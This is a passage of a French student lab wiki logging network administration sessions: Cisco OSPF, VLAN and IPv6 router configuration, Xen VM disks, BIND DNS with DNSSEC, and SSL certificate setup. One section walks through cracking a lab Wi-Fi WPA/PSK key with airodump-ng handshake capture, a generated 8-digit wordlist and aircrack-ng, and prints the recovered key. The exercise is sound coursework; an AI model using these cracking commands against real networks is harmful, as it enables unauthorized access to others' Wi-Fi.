 Switch(config)#router ospf 1        &lt;br /&gt;
 Switch(config-router)#router-id 10.60.11.252 &lt;br /&gt;
 Switch(config-router)#summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
 Switch(config-router)#redistribute connected subnets &lt;br /&gt;
 Switch(config-router)#summary-address 192.168.0.0 255.255.255.0 not-advertise&lt;br /&gt;
 Switch(config-router)#summary-address 10.60.0.0 255.255.0.0 not-advertise    &lt;br /&gt;
 Switch(config-router)#network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
 Switch(config-router)#exit&lt;br /&gt;
&lt;br /&gt;
===Mise en place des partitions pour la VM===&lt;br /&gt;
Sur cordouan&lt;br /&gt;
&lt;br /&gt;
  lvcreate -L10G -nIMA5_Dionysos_var virtual&lt;br /&gt;
  lvcreate -L10G -nIMA5_Dionysos_home virtual&lt;br /&gt;
  &lt;br /&gt;
  &lt;br /&gt;
  mke2fs /dev/virtual/IMA5_Dionysos_var&lt;br /&gt;
  mke2fs /dev/virtual/IMA5_Dionysos_home&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/xen/Dionysos.cfg&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/swap.img,xvda1,w&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_var,xvdb2,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_home,xvdb1,w',&lt;br /&gt;
               ]&lt;br /&gt;
&lt;br /&gt;
Sur la VM, dans le fichier /etc/fstab&lt;br /&gt;
  /dev/xvdb1 /home ext4 defaults 0 3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Le cas du répertoire /var est plus complexe. &lt;br /&gt;
&lt;br /&gt;
Si nous utilisons la même méthode que pour /home, nous perdrons le /var. Nous ne pourrions donc plus utiliser apt-get, par exemple.&lt;br /&gt;
&lt;br /&gt;
Dans la VM, dans le fichier /etc/fstab&lt;br /&gt;
  /dev/xvdb2 /mnt ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
Puis dans le terminal de la VM&lt;br /&gt;
  mount /dev/xvdb2 /mnt &lt;br /&gt;
  mv /var/* /mnt/&lt;br /&gt;
  unmount /mnt&lt;br /&gt;
  mount -a&lt;br /&gt;
&lt;br /&gt;
Via la commande df nous contrôlons le résultat.&lt;br /&gt;
   Filesystem     1K-blocks    Used Available Use% Mounted on&lt;br /&gt;
   ...                  ...     ...       ...  ... ...&lt;br /&gt;
   /dev/xvdb1      10255636   36888   9678076   1% /home&lt;br /&gt;
   /dev/xvdb2      10321208   23028   9773892   1% /var&lt;br /&gt;
&lt;br /&gt;
===Mise en place serveur DNS===&lt;br /&gt;
Utilisation de la méthode bind&lt;br /&gt;
&lt;br /&gt;
Dans le répertoire /etc/bind, nous modifirons les trois fichiers suivants :&lt;br /&gt;
&lt;br /&gt;
named.conf.options&lt;br /&gt;
&lt;br /&gt;
  options {&lt;br /&gt;
        directory &amp;quot;/var/cache/bind&amp;quot;;&lt;br /&gt;
  &lt;br /&gt;
        // If there is a firewall between you and nameservers you want&lt;br /&gt;
        // to talk to, you may need to fix the firewall to allow multiple&lt;br /&gt;
        // ports to talk.  See http://www.kb.cert.org/vuls/id/800113&lt;br /&gt;
  &lt;br /&gt;
        // If your ISP provided one or more IP addresses for stable&lt;br /&gt;
        // nameservers, you probably want to use them as forwarders.&lt;br /&gt;
        // Uncomment the following block, and insert the addresses replacing&lt;br /&gt;
        // the all-0's placeholder.&lt;br /&gt;
  &lt;br /&gt;
        // forwarders {&lt;br /&gt;
        //   0.0.0.0;&lt;br /&gt;
        // };&lt;br /&gt;
  &lt;br /&gt;
        //========================================================================&lt;br /&gt;
        // If BIND logs error messages about the root key being expired,&lt;br /&gt;
        // you will need to update your keys.  See https://www.isc.org/bind-keys&lt;br /&gt;
        //========================================================================&lt;br /&gt;
  &lt;br /&gt;
        //Mise en place du DNSSEC&lt;br /&gt;
        dnssec-enable yes;&lt;br /&gt;
  &lt;br /&gt;
        dnssec-validation auto;&lt;br /&gt;
  &lt;br /&gt;
        auth-nxdomain no;&lt;br /&gt;
        listen-on-v6 { any; };&lt;br /&gt;
        allow-recursion{localhost;};&lt;br /&gt;
  };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
named.conf.local&lt;br /&gt;
&lt;br /&gt;
  zone &amp;quot;dionysos.space&amp;quot;{&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;/etc/bind/db.dionysos.space&amp;quot;;&lt;br /&gt;
        allow-transfer{217.70.177.40;}; //Autorisation transfert vers ns6.gandi.net&lt;br /&gt;
  };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis nous créons le fichier /etc/bind/db.dionysos.space&lt;br /&gt;
  cp db.local db.dionysos.pw &lt;br /&gt;
&lt;br /&gt;
Dans ce fichier nous entrons les paramètres suivants&lt;br /&gt;
&lt;br /&gt;
  ;&lt;br /&gt;
  ; BIND data file for local loopback interface&lt;br /&gt;
  ;&lt;br /&gt;
  $TTL    604800&lt;br /&gt;
  $include /root/SSL_certif/dionysos-ksk.key&lt;br /&gt;
  $include /root/SSL_certif/dionysos-zsk.key&lt;br /&gt;
  &lt;br /&gt;
  @       IN      SOA     ns.dionysos.space. root.dionysos.space (&lt;br /&gt;
                                2         ; Serial&lt;br /&gt;
                           604800         ; Refresh&lt;br /&gt;
                            86400         ; Retry&lt;br /&gt;
                          2419200         ; Expire&lt;br /&gt;
                           604800 )       ; Negative Cache TTL&lt;br /&gt;
  ;&lt;br /&gt;
          IN      NS      ns.dionysos.space. ;dns principal&lt;br /&gt;
          IN      NS      ns6.gandi.net.     ;dns secondaire&lt;br /&gt;
  @       IN      A       193.48.57.178      ;acces sans le &amp;quot;www.&amp;quot;&lt;br /&gt;
  ns      IN      NS      193.48.57.178      ;acces avec http https&lt;br /&gt;
  www     IN      A       193.48.57.178;     ;acces avec le &amp;quot;www.&lt;br /&gt;
&lt;br /&gt;
===Certificat SSL===&lt;br /&gt;
  &lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
  openssl req -nodes -newkey rsa:2048 -sha1 -keyout dionysos.space.key -out dionysos.space.csr&lt;br /&gt;
  ...&lt;br /&gt;
  Common Name (e.g. server FQDN or YOUR name) []:dionysos.space et dionysos.space.key&lt;br /&gt;
  Email Address []:qboens@polytech-lille.net&lt;br /&gt;
&lt;br /&gt;
Cette opération génére deux fichiers : dionysos.space.crt et dionysos.space.key&lt;br /&gt;
&lt;br /&gt;
Une fois cette étape faite on récupére sur gandi GandiStandardSSLCA2.pem, dans l'onglet du certificat.&lt;br /&gt;
&lt;br /&gt;
Tous les fichiers sont placés dans le répertoire SSL_certif&lt;br /&gt;
  mv dionysos.space.csr SSL_certif&lt;br /&gt;
  mv dionysos.space.key SSL_certif&lt;br /&gt;
  mv GandiStandardSSLCA2.pem SSL_certif&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Installation de DNSSEC===&lt;br /&gt;
&lt;br /&gt;
Création de la clef KSK&lt;br /&gt;
  dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE dionysos.space&lt;br /&gt;
&lt;br /&gt;
Création de la clef ZSK&lt;br /&gt;
  dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE dionysos.space&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Ces clefs ont été crées dans le dossier SSL_certif&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Création d'un fichier signé à partir de db.dionysos.space&lt;br /&gt;
  dnssec-signzone -o dionysos.space -k dionysos-ksk.key /etc/bind/db.dionysos.space dionysos-zsk.key &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Dans named.conf.local nous changons le fichier cible, pour que bind9 prenne en compte db.dionysos.space.signed, qui est le fichier signé&lt;br /&gt;
  zone &amp;quot;dionysos.space&amp;quot;{&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;/etc/bind/db.dionysos.space.signed&amp;quot;;&lt;br /&gt;
        allow-transfer{217.70.177.40;}; //Autorisation transfert vers ns6.gandi.net&lt;br /&gt;
  };&lt;br /&gt;
&lt;br /&gt;
Puis nous relançons bind9&lt;br /&gt;
  service bind9 restart&lt;br /&gt;
&lt;br /&gt;
Sur le site gandi nous ajoutons les deux clefs, dans l'onglet DNSSEC&lt;br /&gt;
&lt;br /&gt;
==Séance 3.5 : 14/12/2018==&lt;br /&gt;
&lt;br /&gt;
===Craquage WPA/PSK par dictionnaire===&lt;br /&gt;
&lt;br /&gt;
Materiel utilisé :&lt;br /&gt;
&lt;br /&gt;
* un PC portable&lt;br /&gt;
* une clé Wi-Pi (nécessaire pour le PC portable que nous avons utilisé pour la partie handshake)&lt;br /&gt;
* Zabeth13 pour le craquage&lt;br /&gt;
&lt;br /&gt;
====Récupération du handshake====&lt;br /&gt;
&lt;br /&gt;
Premièrement sur le PC portable SOLE, &lt;br /&gt;
&lt;br /&gt;
 #ip a&lt;br /&gt;
&lt;br /&gt;
pour vérifier que nous disposons bien d'une interface wifi &amp;lt;code&amp;gt;wlx40a5ef0f68ce&amp;lt;/code&amp;gt;, puis nous l'utilisons pour écouter sur le wifi :&lt;br /&gt;
&lt;br /&gt;
 #airmon-ng start &amp;lt;nom_de_l'interface&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On récupère l'interface retournée, dans notre cas &amp;lt;code&amp;gt;wlan0mon&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 #airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
On note l'ESSID de cracotte02 et son channel pour ensuite renvoyer dans des fichiers&lt;br /&gt;
&lt;br /&gt;
 #airodump-ng --bssid &amp;lt;ESSID cracotte02&amp;gt; wlan0mon --channel 9 --write FILENAME&lt;br /&gt;
&lt;br /&gt;
On dispose ensuite de 4 fichiers FILENAME.cap FILENAME.csv FILENAME.kismet.csv FILENAME.kismet.netxml&lt;br /&gt;
&lt;br /&gt;
On peut à présent transférer ces fichiers sur ZABETH13 via clé usb:&lt;br /&gt;
&lt;br /&gt;
====Rappel montage USB====&lt;br /&gt;
&lt;br /&gt;
 #fdisk -l                                                 //avant de brancher la clé USB&lt;br /&gt;
 #fdisk -l                                                 //on récupère l'emplacement de la clé (ex: /dev/sdb -&amp;gt; /dev/sdb1)&lt;br /&gt;
 #mkdir /media/MA_CLE_USB&lt;br /&gt;
 #mount /dev/sdb1 /media/MA_CLE_USB&lt;br /&gt;
 #mv /home/pifou/Mon_FICHIER /media/MA_CLE_USB             //répéter autant que nécessaire&lt;br /&gt;
 #umount /media/MA_CLE_USB&lt;br /&gt;
&lt;br /&gt;
====Crack WPA/PSK====&lt;br /&gt;
&lt;br /&gt;
On crée un petit programme &amp;lt;code&amp;gt;main.c&amp;lt;/code&amp;gt; pour lister tous les codes possibles, on sait qu'il s'agit d'un code de 8 chiffres&lt;br /&gt;
&lt;br /&gt;
 #include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
 #include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
 int main(){&lt;br /&gt;
     int i;&lt;br /&gt;
     // key is 8 numeric digits&lt;br /&gt;
     for(i=0;i&amp;lt;99999999;i++){&lt;br /&gt;
         printf(&amp;quot;%d\n&amp;quot;,i);&lt;br /&gt;
     }&lt;br /&gt;
     return 0;&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
On compile et on stock dans un txt&lt;br /&gt;
&lt;br /&gt;
 #gcc main.c -o main -Wall&lt;br /&gt;
 #./main &amp;gt; dictionnaire.txt&lt;br /&gt;
&lt;br /&gt;
On peut à présent lancer le crack&lt;br /&gt;
&lt;br /&gt;
 #aircrack-ng FILENAME.cap -w dictionnaire.txt&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:crack-cracotte02.png]]&lt;br /&gt;
&lt;br /&gt;
Après un certains temps d'execution, on obtient la clé&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Found_key.png]]&lt;br /&gt;
&lt;br /&gt;
Clé : 42429902&lt;br /&gt;
==Séance 4 : 17/12/2018==&lt;br /&gt;
===Correction IPV6 routeur===&lt;br /&gt;
&lt;br /&gt;
==== Vlan 43 - XEN ====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan43&lt;br /&gt;
 int vlan43&lt;br /&gt;
 ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 22 ip 193.48.57.190&lt;br /&gt;
 standby 22 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60C0::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
==== Vlan 131 - Interconnexion ====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan 131&lt;br /&gt;
 int vlan 131&lt;br /&gt;
 ip address 192.168.222.9 255.255.255.248         &lt;br /&gt;
 ipv6 address fe80::2 link-local                  &lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 rip tpima2a5 enable                        &lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
==== Vlan 10+N - Groupe N ====&lt;br /&gt;
&lt;br /&gt;
'''IPv4'''&lt;br /&gt;
&lt;br /&gt;
* Notre Routeur : &amp;lt;code&amp;gt;10.60.10+N.252&amp;lt;/code&amp;gt;&lt;br /&gt;
* Routeur Virtuel : &amp;lt;code&amp;gt;10.60.10+N.254&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''IPv6'''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;2001:660:4401:60XX&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* VLAN 11 à 21 : &amp;lt;code&amp;gt;C1&amp;lt;/code&amp;gt; à &amp;lt;code&amp;gt;CB&amp;lt;/code&amp;gt;&lt;br /&gt;
* VLAN 43 : &amp;lt;code&amp;gt;C0&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Groupe 1&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan11&lt;br /&gt;
 int vlan11&lt;br /&gt;
 ip address 10.60.11.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 11 ip 10.60.11.254&lt;br /&gt;
 standby 11 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C1::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C1::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 11&lt;br /&gt;
 name groupe1&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 2&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan12&lt;br /&gt;
 int vlan12&lt;br /&gt;
 ip address 10.60.12.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 12 ip 10.60.12.254&lt;br /&gt;
 standby 12 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C2::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C2::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 12&lt;br /&gt;
 name groupe2&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 3&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan13&lt;br /&gt;
 int vlan13&lt;br /&gt;
 ip address 10.60.13.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 13 ip 10.60.13.254&lt;br /&gt;
 standby 13 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C3::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C3::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 13&lt;br /&gt;
 name groupe3&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 4&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan14&lt;br /&gt;
 int vlan14&lt;br /&gt;
 ip address 10.60.14.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 14 ip 10.60.14.254&lt;br /&gt;
 standby 14 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C4::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C4::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 14&lt;br /&gt;
 name groupe4&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 5&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan15&lt;br /&gt;
 int vlan15&lt;br /&gt;
 ip address 10.60.15.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 15 ip 10.60.15.254&lt;br /&gt;
 standby 15 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C5::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C5::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 15&lt;br /&gt;
 name groupe5&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 6&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan16&lt;br /&gt;
 int vlan16&lt;br /&gt;
 ip address 10.60.16.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 16 ip 10.60.16.254&lt;br /&gt;
 standby 16 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C6::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C6::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 16&lt;br /&gt;
 name groupe6&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 7&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan17&lt;br /&gt;
 int vlan17&lt;br /&gt;
 ip address 10.60.17.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 17 ip 10.60.17.254&lt;br /&gt;
 standby 17 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C7::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C7::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 17&lt;br /&gt;
 name groupe7&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 8&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan18&lt;br /&gt;
 int vlan18&lt;br /&gt;
 ip address 10.60.18.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 18 ip 10.60.18.254&lt;br /&gt;
 standby 18 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C8::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C8::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 18&lt;br /&gt;
 name groupe8&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 9&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan19&lt;br /&gt;
 int vlan19&lt;br /&gt;
 ip address 10.60.19.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 19 ip 10.60.19.254&lt;br /&gt;
 standby 19 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C9::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C9::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 19&lt;br /&gt;
 name groupe9&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 10&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan20&lt;br /&gt;
 int vlan20&lt;br /&gt;
 ip address 10.60.20.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 20 ip 10.60.20.254&lt;br /&gt;
 standby 20 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60CA::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60CA::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 20&lt;br /&gt;
 name groupe10&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 11&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan21&lt;br /&gt;
 int vlan21&lt;br /&gt;
 ip address 10.60.21.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 21 ip 10.60.21.254&lt;br /&gt;
 standby 21 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60CB::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60CB::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 21&lt;br /&gt;
 name groupe11&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
==== Vérifications du fonctionnement ====&lt;br /&gt;
&lt;br /&gt;
===== show running-config =====&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show run &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 [...]&lt;br /&gt;
 ipv6 unicast-routing&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 spanning-tree mode pvst&lt;br /&gt;
 spanning-tree loopguard default&lt;br /&gt;
 spanning-tree etherchannel guard misconfig&lt;br /&gt;
 spanning-tree extend system-id&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/2&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/3&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/4&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/5&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/6&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/7&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !         &lt;br /&gt;
 interface GigabitEthernet0/8&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/9&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/10&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/11&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 interface TenGigabitEthernet0/1&lt;br /&gt;
  switchport access vlan 131&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode access&lt;br /&gt;
 !&lt;br /&gt;
 interface TenGigabitEthernet0/2&lt;br /&gt;
  switchport access vlan 43&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode access&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan1&lt;br /&gt;
  ip address 10.60.1.252 255.255.255.0&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan11&lt;br /&gt;
  ip address 10.60.11.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C1::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C1::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 11 ip 10.60.11.254&lt;br /&gt;
  standby 11 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan12&lt;br /&gt;
  ip address 10.60.12.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C2::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C2::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 12 ip 10.60.12.254&lt;br /&gt;
  standby 12 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan13&lt;br /&gt;
  ip address 10.60.13.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C3::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C3::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 13 ip 10.60.13.254&lt;br /&gt;
  standby 13 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan14&lt;br /&gt;
  ip address 10.60.14.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C4::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C4::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 14 ip 10.60.14.254&lt;br /&gt;
  standby 14 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan15&lt;br /&gt;
  ip address 10.60.15.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C5::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C5::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 15 ip 10.60.15.254&lt;br /&gt;
  standby 15 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan16&lt;br /&gt;
  ip address 10.60.16.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C6::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C6::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 16 ip 10.60.16.254&lt;br /&gt;
  standby 16 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan17&lt;br /&gt;
  ip address 10.60.17.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C7::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C7::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 17 ip 10.60.17.254&lt;br /&gt;
  standby 17 preempt&lt;br /&gt;
 !         &lt;br /&gt;
 interface Vlan18&lt;br /&gt;
  ip address 10.60.18.252 255.255.255.0&lt;br /&gt;
